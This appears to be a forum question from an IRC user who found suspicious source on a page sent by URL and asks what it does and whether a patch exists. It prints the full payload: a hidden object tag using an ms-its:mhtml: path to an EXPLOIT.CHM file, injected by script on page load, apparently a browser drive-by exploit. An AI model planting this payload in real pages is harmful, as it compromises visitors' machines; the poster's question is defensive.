I am on mIRC and someone send a notice with a url. So I grab the source of the page using a tool and found this:

<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm" type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('exploit.htm'))));
</script>

What does this do? Is there a patch for this?